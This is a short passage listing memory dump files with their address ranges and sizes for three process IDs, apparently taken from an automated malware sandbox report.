      • memory/1412-23-0x0000000008B10000-0x00000000090B4000-memory.dmp

        Filesize

        5.6MB

      • memory/1412-25-0x00000000708EE000-0x00000000708EF000-memory.dmp

        Filesize

        4KB

      • memory/1412-26-0x00000000708E0000-0x0000000071090000-memory.dmp

        Filesize

        7.7MB

      • memory/1412-2-0x00000000708E0000-0x0000000071090000-memory.dmp

        Filesize

        7.7MB

      • memory/1412-61-0x00000000708E0000-0x0000000071090000-memory.dmp

        Filesize

        7.7MB

      • memory/1412-1-0x0000000002DE0000-0x0000000002E16000-memory.dmp

        Filesize

        216KB

      • memory/2300-38-0x00000000088D0000-0x000000000C495000-memory.dmp

        Filesize

        59.8MB

      • memory/2716-40-0x0000000000A90000-0x0000000004655000-memory.dmp

        Filesize

        59.8MB

      • memory/2716-55-0x0000000000400000-0x00000000005E4000-memory.dmp

        Filesize

        1.9MB

      • memory/2716-56-0x0000000000400000-0x00000000005E4000-memory.dmp

        Filesize

        1.9MB

      • memory/2716-65-0x0000000000400000-0x00000000005E4000-memory.dmp

        Filesize

        1.9MB